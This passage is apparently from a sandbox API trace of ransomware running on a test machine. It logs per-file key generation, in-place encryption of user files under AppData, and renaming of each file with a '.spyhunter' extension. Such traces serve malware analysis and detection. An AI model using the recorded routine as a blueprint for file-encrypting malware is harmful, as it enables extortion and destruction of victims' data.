(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl.spyhunter")) returned 1 [0138.656] GetProcessHeap () returned 0x2c0000 [0138.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.656] GetProcessHeap () returned 0x2c0000 [0138.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.657] GetProcessHeap () returned 0x2c0000 [0138.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc98d8 | out: hHeap=0x2c0000) returned 1 [0138.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4e8 | out: pbBuffer=0x248f4e8) returned 1 [0138.657] GetProcessHeap () returned 0x2c0000 [0138.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.657] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4e0*=0x30) returned 1 [0138.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0138.660] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 80 [0138.662] StrStrW (lpFirst="oeold.xml", lpSrch=".txt") returned 0x0 [0138.662] GetProcessHeap () returned 0x2c0000 [0138.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.662] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4a4*=0x104, lpOverlapped=0x0) returned 1 [0138.663] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.663] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4a4*=0x104, lpOverlapped=0x0) returned 1 [0138.663] GetProcessHeap () returned 0x2c0000 [0138.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.663] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.663] WriteFile (in: hFile=0xf0, lpBuffer=0x248f4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x248f4e4*, lpNumberOfBytesWritten=0x248f4a4*=0x4, lpOverlapped=0x0) returned 1 [0138.664] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4a4*=0x30, lpOverlapped=0x0) returned 1 [0138.664] CloseHandle (hObject=0xf0) returned 1 [0138.968] GetProcessHeap () returned 0x2c0000 [0138.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.968] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.spyhunter") returned 90 [0138.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\oeold.xml.spyhunter")) returned 1 [0138.969] GetProcessHeap () returned 0x2c0000 [0138.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.969] GetProcessHeap () returned 0x2c0000 [0138.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.969] GetProcessHeap () returned 0x2c0000 [0138.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8deb8 | out: hHeap=0x2c0000) returned 1 [0139.054] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4d8 | out: pbBuffer=0x248f4d8) returned 1 [0139.054] GetProcessHeap () returned 0x2c0000 [0139.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0139.055] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4d0*=0x30) returned 1 [0139.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0139.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0139.069] StrStrW (lpFirst="Stars.jpg", lpSrch=".txt") returned 0x0 [0139.069] GetProcessHeap () returned 0x2c0000 [0139.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.069] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f494*=0x1d51, lpOverlapped=0x0) returned 1 [0139.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.173] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1d51, lpNumberOfBytesWritten=0x248f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f494*=0x1d51, lpOverlapped=0x0) returned 1 [0139.174] GetProcessHeap () returned 0x2c0000 [0139.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.174] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.174] WriteFile (in: hFile=0x158, lpBuffer=0x248f4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f494, lpOverlapped=0x0 | out: lpBuffer=0x248f4d4*, lpNumberOfBytesWritten=0x248f494*=0x4, lpOverlapped=0x0) returned 1 [0139.174] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f494, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f494*=0x30, lpOverlapped=0x0) returned 1 [0139.174] CloseHandle (hObject=0x158) returned 1 [0139.174] GetProcessHeap () returned 0x2c0000 [0139.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f92e30 [0139.174] wnsprintfW (in: pszDest=0x2f92e30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.spyhunter") returned 101 [0139.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.spyhunter")) returned 1 [0139.197] GetProcessHeap () returned 0x2c0000 [0139.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f92e30 | out: hHeap=0x2c0000) returned 1 [0139.197] GetProcessHeap () returned 0x2c0000 [0139.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0139.198] GetProcessHeap () returned 0x2c0000 [0139.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45d28 | out: hHeap=0x2c0000) returned 1 [0139.199] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4d0 | out: pbBuffer=0x248f4d0) returned 1 [0139.199] GetProcessHeap () returned 0x2c0000 [0139.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0139.199] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4c8*=0x30) returned 1 [0139.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0139.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0139.199] StrStrW (lpFirst="startupCache.4.little", lpSrch=".txt") returned 0x0 [0139.199] GetProcessHeap () returned 0x2c0000 [0139.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.200] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f48c*=0x2800, lpOverlapped=0x0) returned 1 [0139.315] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.315] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f48c*=0x2800, lpOverlapped=0x0) returned 1 [0139.315] GetProcessHeap () returned 0x2c0000 [0139.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.315] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.315] WriteFile (in: hFile=0x158, lpBuffer=0x248f4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x248f4cc*, lpNumberOfBytesWritten=0x248f48c*=0x4, lpOverlapped=0x0) returned 1 [0139.465] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f48c*=0x30, lpOverlapped=0x0) returned 1 [0139.465] CloseHandle (hObject=0x158) returned 1 [0139.465] GetProcessHeap () returned 0x2c0000 [0139.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0139.466] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.spyhunter") returned 134 [0139.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.spyhunter")) returned 1 [0139.467] GetProcessHeap () returned 0x2c0000 [0139.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0139.467] GetProcessHeap () returned 0x2c0000 [0139.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0139.467] GetProcessHeap () returned 0x2c0000 [0139.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe4a8 | out: hHeap=0x2c0000) returned 1 [0139.467] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4d0 | out: pbBuffer=0x248f4d0) returned 1 [0139.467] GetProcessHeap () returned 0x2c0000 [0139.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0139.467] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4c8*=0x30) returned 1 [0139.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0139.480] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".txt") returned 0x0 [0139.480] GetProcessHeap () returned 0x2c0000 [0139.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.480] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f48c*=0x2800, lpOverlapped=0x0) returned 1 [0139.656] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.656] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f48c*=0x2800, lpOverlapped=0x0) returned 1 [0139.656] GetProcessHeap () returned 0x2c0000 [0139.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.656] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.656] WriteFile (in: hFile=0x184, lpBuffer=0x248f4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x248f4cc*, lpNumberOfBytesWritten=0x248f48c*=0x4, lpOverlapped=0x0) returned 1 [0139.749] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f48c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f48c*=0x30, lpOverlapped=0x0) returned 1 [0139.749] CloseHandle (hObject=0x184) returned 1 [0139.860] GetProcessHeap () returned 0x2c0000 [0139.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.861] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.spyhunter") returned 94 [0139.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.spyhunter")) returned 1 [0139.862] GetProcessHeap () returned 0x2c0000 [0139.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.862] GetProcessHeap () returned 0x2c0000 [0139.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0139.863] GetProcessHeap () returned 0x2c0000 [0139.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39700 | out: hHeap=0x2c0000) returned 1 [0139.899] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4c8 | out: pbBuffer=0x248f4c8) returned 1 [0139.899] GetProcessHeap () returned 0x2c0000 [0139.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0139.900] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4c0*=0x30) returned 1 [0139.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 78 [0140.052] StrStrW (lpFirst="MSO1033.acl", lpSrch=".txt") returned 0x0 [0140.052] GetProcessHeap () returned 0x2c0000 [0140.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0140.052] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f484*=0x2800, lpOverlapped=0x0) returned 1 [0140.056] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.056] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f484*=0x2800, lpOverlapped=0x0) returned 1 [0140.057] GetProcessHeap () returned 0x2c0000 [0140.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0140.057] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.057] WriteFile (in: hFile=0x184, lpBuffer=0x248f4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f484, lpOverlapped=0x0 | out: lpBuffer=0x248f4c4*, lpNumberOfBytesWritten=0x248f484*=0x4, lpOverlapped=0x0) returned 1 [0140.231] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f484, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f484*=0x30, lpOverlapped=0x0) returned 1 [0140.231] CloseHandle (hObject=0x184) returned 1 [0140.231] GetProcessHeap () returned 0x2c0000 [0140.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.231] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.spyhunter") returned 88 [0140.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.spyhunter")) returned 1 [0140.232] GetProcessHeap () returned 0x2c0000 [0140.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.232] GetProcessHeap () returned 0x2c0000 [0140.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.232] GetProcessHeap () returned 0x2c0000 [0140.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f048 | out: hHeap=0x2c0000) returned 1 [0140.241] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4b8 | out: pbBuffer=0x248f4b8) returned 1 [0140.241] GetProcessHeap () returned 0x2c0000 [0140.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.241] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4b0*=0x30) returned 1 [0140.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 83 [0140.242] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0140.243] GetProcessHeap () returned 0x2c0000 [0140.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.243] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f474*=0x34, lpOverlapped=0x0) returned 1 [0140.244] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffffcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.244] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f474*=0x34, lpOverlapped=0x0) returned 1 [0140.244] GetProcessHeap () returned 0x2c0000 [0140.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.244] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.244] WriteFile (in: hFile=0x184, lpBuffer=0x248f4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x248f4b4*, lpNumberOfBytesWritten=0x248f474*=0x4, lpOverlapped=0x0) returned 1 [0140.244] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f474*=0x30, lpOverlapped=0x0) returned 1 [0140.244] CloseHandle (hObject=0x184) returned 1 [0140.244] GetProcessHeap () returned 0x2c0000 [0140.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.245] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: 